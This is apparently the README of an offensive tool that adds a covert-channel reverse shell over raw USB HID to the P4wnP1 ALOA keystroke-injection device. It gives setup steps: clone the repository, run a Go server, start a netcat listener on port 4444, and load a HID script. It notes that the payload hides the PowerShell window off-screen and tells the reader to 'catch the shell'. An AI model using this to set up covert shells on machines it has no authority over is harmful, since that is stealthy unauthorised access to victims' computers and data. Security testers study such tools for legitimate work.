This is an alternative to the built-in covert channel option for the P4wnP1 aloa (https://github.com/RoganDawes/P4wnP1_aloa)
that goes over a raw HID and USB rather than WiFi.
Since @RoganDawes version was lacking a bit of documentation and the hide function was not working at all, I implemented a new way of doing this.
The function itself, which is base64 decoded in the helper.js now can be found in the hide.ps1 file. If you don't trust me, and you probably shouldn't, then you can base64 decode it yourself:
[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-Content -Raw -Path .\hide.ps1)))| Set-Content .\encoded.txt
It is crucial that you have the RAW HID function active. Otherwise this won't work:
git clone https://github.com/LuemmelSec/CovertChannel
go run server.go
nc -lvnp 4444
Copy the content of the helper.js into the ``HIDSCRIPT```section of your P4wnP1
Adjust all the settings to your needs. The way it defaults to is movin the ISE out of view with X -2000 and Y -2000
Change the keyboard layout !!!
Last but not least: Run the payload and catch the shell.